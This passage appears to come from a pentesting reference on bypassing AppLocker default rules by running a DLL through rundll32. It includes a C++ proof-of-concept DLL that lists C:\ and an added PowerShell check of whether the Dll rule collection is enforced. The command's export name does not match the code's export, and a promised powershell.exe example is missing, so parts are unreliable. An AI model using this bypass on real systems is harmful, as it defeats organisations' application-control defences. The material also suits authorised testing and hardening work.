DLL

Default rules can be bypassed by executing a .dll with rundll32:

rundll32 test2.dll,CreateDirAndCopyFile

Here CreateDirAndCopyFile is the name of the function exported from your DLL; it must match the export exactly.
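The reason this works is that rundll32.exe itself is covered by the allow rules, while the DLL it loads is only evaluated when the Dll rule collection is enforced. The following PowerShell script is an added check, not code from the original page; it assumes the policy in question is AppLocker, and $DllPath and $TestUser are placeholders:

```powershell
# Added defender-side check, not code from the original page.
# Assumes the "default rules" above are AppLocker's. Reads the effective
# AppLocker policy, reports whether the Dll rule collection is enforced,
# and asks AppLocker what it would decide for a DLL at a placeholder path.
param(
    [string]$DllPath  = "$env:TEMP\test2.dll",  # placeholder: DLL to evaluate
    [string]$TestUser = 'Everyone'              # placeholder: principal to evaluate as
)

# Effective policy = local policy merged with any domain-applied policy.
$policy = Get-AppLockerPolicy -Effective
[xml]$xml = Get-AppLockerPolicy -Effective -Xml

$dllCollection = $xml.AppLockerPolicy.RuleCollection |
    Where-Object { $_.Type -eq 'Dll' }

if (-not $dllCollection -or $dllCollection.EnforcementMode -ne 'Enabled') {
    # Collection absent or NotConfigured/AuditOnly: DLLs loaded by an allowed
    # host such as rundll32.exe are never blocked by the Exe rules alone.
    $mode = if ($dllCollection) { $dllCollection.EnforcementMode } else { 'absent' }
    Write-Warning "Dll rule collection is not enforced (mode: $mode); rundll32 <dll>,<export> loads DLLs the Exe rules never see."
}
else {
    $ruleCount = $dllCollection.SelectNodes('*').Count
    Write-Host "Dll rule collection enforced with $ruleCount rule(s)."
}

# Ask AppLocker for its decision on the candidate DLL. The file must exist,
# because hash and publisher rules are evaluated against its contents.
if (Test-Path -LiteralPath $DllPath) {
    Test-AppLockerPolicy -PolicyObject $policy -Path $DllPath -User $TestUser |
        Select-Object FilePath, PolicyDecision, MatchingRule
}
else {
    Write-Host "No file at $DllPath; skipping Test-AppLockerPolicy."
}
```

A PolicyDecision of Allowed for a DLL in a user-writable folder, or a warning that the collection is not enforced, is the condition the bypass above relies on.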

Examples

In the following example we list the contents of the C:\ drive as a PoC:

// test2.cpp : Defines the exported functions for the DLL.
//

#include "pch.h"
#include "framework.h"
#include "test2.h"
#include <windows.h>
#include <string>
#include <sstream>

// Include <filesystem> with appropriate compatibility namespace
#if __has_include(<filesystem>)
#include <filesystem>
namespace fs = std::filesystem;
#elif __has_include(<experimental/filesystem>)
#include <experimental/filesystem>
namespace fs = std::experimental::filesystem;
#else
#error "No filesystem support."
#endif

// Entry point invoked via: rundll32 test2.dll,ShowDirectoryContents
// rundll32 passes (HWND, HINSTANCE, LPSTR, int); this export ignores them.
extern "C" __declspec(dllexport) void ShowDirectoryContents()
{
    std::ostringstream directoryContents;
    std::string directoryPath = "C:\\";

    try
    {
        // Enumerate files and directories in C:\
        for (fs::directory_iterator iter(directoryPath), end; iter != end; ++iter)
        {
            directoryContents << iter->path().string() << "\n";
        }

        // Get the list as a single string
        std::string contents = directoryContents.str();

        // Ensure the content does not exceed the message box limit (around 4096 characters)
        if (contents.size() > 4000) {
            contents = contents.substr(0, 4000) + "\n... (Output truncated)";
        }

        // Show the contents in a message box
        MessageBoxA(NULL, contents.c_str(), "C:\\ Directory Contents", MB_OK | MB_ICONINFORMATION);
    }
    catch (const fs::filesystem_error& e)
    {
        // Display an error message if there's an issue accessing the directory
        MessageBoxA(NULL, e.what(), "Error Accessing Directory", MB_OK | MB_ICONERROR);
    }
}

In the following example we will move powershell.exe to an allowed folder.

With a DLL you can do pretty much anything, since you can call the Windows APIs directly; these are just examples, and you can of course also just run shellcode.
